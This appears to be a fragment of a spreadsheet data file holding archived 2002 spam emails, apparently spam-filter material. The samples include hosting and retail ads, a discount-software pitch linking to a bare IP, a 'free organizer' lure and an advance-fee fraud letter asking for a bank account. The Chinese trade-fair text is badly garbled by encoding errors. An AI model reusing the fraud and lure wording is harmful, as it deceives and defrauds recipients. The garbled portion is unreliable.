are going to give you 1 free month of service.We offer a 30 Day money back guarantee so this offer is 
absolutely risk free. Come find out what it is like to host with a company 
that has Real Live 24/7 Support and enough bandwidth to host the 
largest web sites worldwide.Key 
Features of Reseller PlansAutomated 
customer signupAutomated domain registrationCredit card 
processingRecurrent billingE-mailÂ  invoicingFully automated 
set-up Includes Win2000 AND Linux 
OSCompletely brandable interfaceMultilingual supportFlexible end 
user interfaceControl Panel Walk Through provided by our 
techsShared or Dedicated IPsDatabase hosting (MySQL, MS SQL, PostgreSQL, 
Access and ODBC) E-commerce support (Miva and osCommerce) ASP PHP ColdFusion Integrated WebMail Streaming Media hosting Shared FTP 
accessÂ  Anonymous FTPError Document 
managementShared SSL support CGI 
scriptsAnd Much more...
This offer is a Month End Closeout so please act before 9/30/2002 
Sign up before 
Wed 9/25/2002 and receive $50 off of the set up feeFor more information 
Â call 1-866-858-HOST 
(4678)Â 
Â Â Â 
Â Unsubscribe&lt;
B&gt;|Make sure to include all addresses you 
want removedÂ </t>
  </si>
  <si>
    <t>HAS YOUR MORTGAGE SEARCH GOT YOU DOWN?Are you frustrated and confused with all the different terms and quotes? Don't
know who is telling you the truth? We can solve all your problems.Visit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[RYTE^3247(^(PO1:KJ)_8J7BJK]</t>
  </si>
  <si>
    <t xml:space="preserve">Never Pay Retail!
ManWomana Mana WomanAny
 Alaska
 Alabama
 Arkansas
 Arizona
 California
 Colorado
 Connecticut
 D.C.
 Delaware
 Florida
 Georgia
 Guam
 Hawaii
 Iowa
 Idaho
 Illinois
 Indiana
 Kansas
 Kentucky
 Louisiana
 Massachusetts
 Maryland
 Maine
 Michigan
 Minnesota
 Missouri
 Mississippi
 Montana
 North Carolina
 North Dakota
 Nebraska
 New Hampshire
 New Jersey
 New Mexico
 Nevada
 New York
 Ohio
 Oklahoma
 Oregon
 Pennsylvania
 Puerto Rico
 Rhode Island
 South Carolina
 South Dakota
 Tennessee
 Texas
 Utah
 Virginia
 The Virgin Islands
 Vermont
 Washington
 Wisconsin
 West Virginia
 Wyoming
 ---------
 Alberta
 British Columbia
 Manitoba
 New Brunswick
 Newfoundland
 Northwest Territories
 Nova Scotia
 Ontario
 Prince Edward Island
 Quebec
 Saskatchewan
 Yukon Territory
 ---------
 New South Wales
 Queensland
 South Australia
 Tasmania
 Victoria
 Western AustraliaUnited States
 Afghanistan
 Albania
 Algeria
 Andorra
 Angola
 Antigua
 Argentina
 Armenia
 Aruba
 Australia
 Austria
 Azerbaidjan
 Bahamas
 Bahrain
 Bangladesh
 Barbados
 Belgium
 Belize
 Benin
 Bermuda
 Bhutan
 Bolivia
 Bosnia
 Botswana
 Brazil
 Brunei
 Bulgaria
 Burkina Faso
 Burma
 Burundi
 Cambodia
 Cameroon
 Canada
 Cape Verde
 Central Afr. Rep.
 Chad
 Chile
 China
 Colombia
 Comoros
 Congo
 Congo (Zaire)
 Costa Rica
 Croatia
 Cuba
 Cyprus
 Czech Republic
 Denmark
 Djibouti
 Dominica
 Dom. Republic
 Ecuador
 Egypt
 El Salvador
 Equatorial Guinea
 Eritrea
 Estonia
 Ethiopia
 Fiji
 Finland
 France
 Gabon
 Gambia
 Georgia
 Germany
 Ghana
 Gibraltar
 Greece
 Guam
 Guatemala
 Guinea
 Guinea-Bissau
 Guyana
 Haiti
 Honduras
 Hong Kong
 Hungary
 Iceland
 India
 Indonesia
 Iran
 Iraq
 Ireland
 Israel
 Italy
 Ivory Coast
 Jamaica
 Japan
 Jordan
 Kazakhstan
 Kenya
 Kuwait
 Laos
 Latvia
 Lebanon
 Liberia
 Libya
 Liechtenstein
 Lithuania
 Luxembourg
 Macau
 Macedonia
 Madagascar
 Malawi
 Malaysia
 Maldives
 Mali
 Malta
 Mauritania
 Mauritius
 Mexico
 Moldova
 Monaco
 Mongolia
 Morocco
 Mozambique
 Namibia
 Nepal
 Netherlands
 New Zealand
 Nicaragua
 Niger
 Nigeria
 North Korea
 Norway
 Oman
 Pakistan
 Panama
 Paraguay
 Peru
 Philippines
 Poland
 Portugal
 Puerto Rico
 Qatar
 Romania
 Russia
 Rwanda
 San Marino
 Saudi Arabia
 Senegal
 Sierra Leone
 Singapore
 Slovakia
 Slovenia
 Somalia
 South Africa
 South Korea
 Spain
 Sri Lanka
 Sudan
 Sweden
 Switzerland
 Syria
 Taiwan
 Tanzania
 Thailand
 Togo
 Trinidad
 Tunisia
 Turkey
 Turkmenistan
 Uganda
 Ukraine
 U.A.E.
 United Kingdom
 United States
 Uruguay
 Venezuela
 Vietnam
 Yemen
 Yugoslavia
 Zambia
 Zimbabwe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http://www.frugaljoe.com/unsubscribe.php?eid=392232\~moc.cnietonten^^mj\~1754388\~12a1
</t>
  </si>
  <si>
    <t xml:space="preserve">
Congratulations! You Get a Free Handheld Organizer! 
Dear Friend,
              I have your Personal Digital Organizer. It's FREE, but I need to know where to send it. Click
                Here and complete the form.
                      Organize your life and keep track of
            appointments, names and numbers with this modern digital organizer.
            Store up to 100 important text notes and 100 names/numbers.
            Features easy to use, touch-screen technology, 10 digit calculator,
            currency and metric converters, alarm clock and password
            protection.Plus you can try all of our money-saving benefits
            FREE for 30 days. Act
            Now! 
You also get a full subscription to HOME Magazine at no additional cost!This offer is risk-free, registration only takes a minute and is completely secure.
It's that easy. Your satisfaction is guaranteed because our credibility is on the line.P.S.:
This offer is only valid for the next 48 hours, so Act Now! Copyright 2002, American Homeowners Association (AHA). All rights reserved.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</si>
  <si>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
Â 
6662EeWq8-515WKuU5183iwyB0-300LKqX8676juxP8-030cvdb2664Hhl54
</t>
  </si>
  <si>
    <t xml:space="preserve">
Never Pay Retail!
Â Â You can count on Blair.com for savings, selection and satisfactionï¿½ all day,
Â Â every day. Plus, for a limited time, you'll enjoy FREE standard shipping on
Â Â every order. So shop now!
Â Women's. Must-have fashions.
Â Men's. Dress and casual favorites.
Â Home. Values for every room.
Â Clearance. Closeouts at 40%-75% off.Â Â Just click the button above to go to Blair.com and enjoy FREE shipping 
Â Â automatically on your entire order. (You'll see the savings at checkout.)
Â Â Don't wait. This offer ends October 15, 2002.
ï¿½BLAIR 2000-2002   |   220 Hickory St., Warren, PA 16366You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http://www.frugaljoe.com/unsubscribe.php?eid=384847\~moc.cnietonten^^mj\~1754388\~12a1</t>
  </si>
  <si>
    <t xml:space="preserve">Here is an excerpt from your local newspaper. 
A recent interview with a curious Computer User:
Q: Is my computer supposed run this slow?
A: NO, your computer should be as fast as the day you purchased it.
   The solution to your problem is NORTON SYSTEMWORKS 2002.Q: I think have a Virus, what do I do?
A: QUICK! Before the virus spreads and infects your entire system
   you must get a copy of NORTON SYSTEMWORKS 2002!Q: I am worried that I may lose my data if my computer crashes, how
   do I backup my data safely and EASILY?
A: Everything for your data backup is included in NORTON SYSTEMWORKS 2002.Q: I occasionally need to send a fax with my computer, what will make
   this EASIER for me?
A: Winfax, the easiest to use fax software available is also included
   in NORTON SYSTEMWORKS 2002!Q: This Systemworks 2002 sounds like it does ALOT for my computer, can
   anyone use this software?
A: Yes, it is EASY to use and tech support is included.
   NORTON SYSTEMWORKS 2002 is the best software available on the market
   and helps you and your PC have a better relationship!Q: Ok, but wait, it must cost a TON of money, right?
A: Well, usually yes, -BUT- this is a SPECIAL OFFER. It sells at your local
   computer store for $99 but it is available for a LIMITED TIME for 
   ONLY $29.99 &amp; FREE SHIPPING!!!!Q: WHAT A DEAL! So, HOW DO I ORDER?
A: To Order, Click HERE -&gt; http://168.75.161.77/systemworkse123.htm &lt;-
Q: GREAT, THANKS!
Q: One more question, how do I get REMOVED from this DARN EMAIL LIST?A: That is NOT a problem. Click here -&gt; http://168.75.161.77/removeme.html
   And you will be removed within the legal period of 5 business days.
ISAPP opp code djT*&amp;204
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,I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respect.Well, I am  VICTOR SANKOH, Son to Mr.FODAY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dollars).This money was made from the sell of Gold and Diamond
by my FATHER and he have already
decided to use this money for future investment of
the family before his arrest.Thereafter, I rushed down to Abidjan with these
documents and confirmed the deposit of the box by my
father. Also, I have been granted political stay as a
Refugee by the Government of Cï¿½te d'Ivoire.Meanwhile, my father have instructed me to look for a
trusted foreigner who can assist me to move out this
money from Cï¿½te d'Ivoire immediately for investment .
Based on this , I solicit for your assistance to
transfer this fund into your Account, but I will
demand for the following requirement:(1) Could you provide for me a safe Bank Account where
this fund will be transferred to in your country or
another neaarby country where taxation will not
takegreat toll on the money?(2) Could you be able to assist me to obtain my
travelling papers after this transfer to enable me
come over to meet you in your country for
theinvestment of this money?(3) Could you be able to introduce me to a profitable
business venture that would not require much technical
expertise in your country where part of this fund
willbe invested?Please,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you.For your assistance in this transaction, I have
decided to offer you 12% percent commission of the
total amount at the end of this business. The security
of this business is very important to me and as such,
I would like you to keep this business very
confidential. I shall be expecting your urgent reply.
Thank you and God bless you.VICTOR SANKOH-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> =?GB2312?B?yNW12squ0ru97NbQufq5+rzKtefX08nosbihorXn19PUqsb3vP6horHtw+bM?= =?GB2312?B?+dew1bnAwLvhu7bTrbGow/uyztW5o6E=?=
To: fma@zzzzason.org
Content-Type: multipart/mixed;
 boundary="=_NextPart_2rfkindysadvnqw3nerasdf";charset="GB2312"
MIME-Version: 1.0
Reply-To: webmaster@szdrx.com
Date: Thu, 26 Sep 2002 19:11:11 +0800
X-Priority: 3
X-Mailer: EhooSend 2002dThis is a multi-part message in MIME format--=_NextPart_2rfkindysadvnqw3nerasdf
Content-Type: text/plain
Content-Transfer-Encoding: 7bitï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½2002ï¿½ï¿½4ï¿½ï¿½1ï¿½ï¿½--4ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½http://www.e-dowell.com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2003ï¿½ï¿½4ï¿½ï¿½1ï¿½ï¿½ï¿½ï¿½4ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½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0755-83502458ï¿½ï¿½83502441ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
2003ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½[ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½2002ï¿½ï¿½0737ï¿½ï¿½]
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
2003 the 11th China International Electronic Equipments and 
Components &amp; Surface Mounting Technology Fair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ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 2003ï¿½ï¿½4ï¿½ï¿½1ï¿½ï¿½ï¿½ï¿½4ï¿½ï¿½ 
TIMEï¿½ï¿½April  1st to 4th , 2003 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ADDï¿½ï¿½CHINA HI-TECH FAIR EXHIBITION CENTRE ï¿½ï¿½SHENZHENï¿½ï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½: ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
Approver: Ministry of Science and Technology of People's Republic of China 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½/Sponsors:          
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½    Chinese Institute of Electronics (CIE) 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½/CO-ORGANIZERï¿½ï¿½        
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½  China Semiconductor Association 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½        China Electronics News Agency 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½/Organizer ï¿½ï¿½  
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½  Exhibition Dept. of Chinese Institute of Electronics 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½  SHENZHEN DOWELL INDUSTRIAL CO.,LTD 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½2003ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½            ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½                                         ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½                  
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½                                    ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½: 
ï¿½ï¿½  ï¿½ï¿½ 9ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½       ï¿½ï¿½   ï¿½ï¿½     ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ USD 2800/9m2  USD 300/m2  USD 10/m2 
A   ï¿½ï¿½ RMB 7800/9m2  RMB 800/m2  RMB 25/m2 
B   ï¿½ï¿½ RMB 6800/9m2  RMB 700/m2  RMB25/m2 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½300ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½  ï¿½ï¿½ ï¿½ï¿½ 28000 ï¿½ï¿½  ï¿½ï¿½ ï¿½ï¿½ 10000 ï¿½ï¿½  ï¿½ï¿½ ï¿½ï¿½ 18000 
           ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ 4000  ï¿½ï¿½  ï¿½ï¿½ ï¿½ï¿½ 10000 ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ 2000 
           ï¿½ï¿½  ï¿½ï¿½ ï¿½ï¿½ 8000  ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ 2000
           ï¿½ï¿½  ï¿½ï¿½ ï¿½ï¿½ 3800  ï¿½ï¿½  ï¿½ï¿½ ï¿½ï¿½1000/ï¿½ï¿½ï¿½ï¿½ 
         ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ 3800 ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ 2800 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½210mm*285mmï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½: 
ï¿½ï¿½  ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½  ï¿½ï¿½ï¿½ï¿½ 4000027719200016455 
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½:
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½ï¿½ï¿½:ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½B2603ï¿½ï¿½   
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½518034 
ï¿½ï¿½ï¿½ï¿½:(86) 755-83503744ï¿½ï¿½83502441ï¿½ï¿½83502448ï¿½ï¿½83502458
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½(86)755-83088130  83502435 
ï¿½ï¿½ï¿½ï¿½Website: www.e-dowell.com    www.szdrx.com
E-mail:webmaster@szdrx.com
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½:ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½  
 ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ --=_NextPart_2rfkindysadvnqw3nerasdf
Content-Type: application/octet-stream;
        name="2003ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="2003ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½.jpg"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
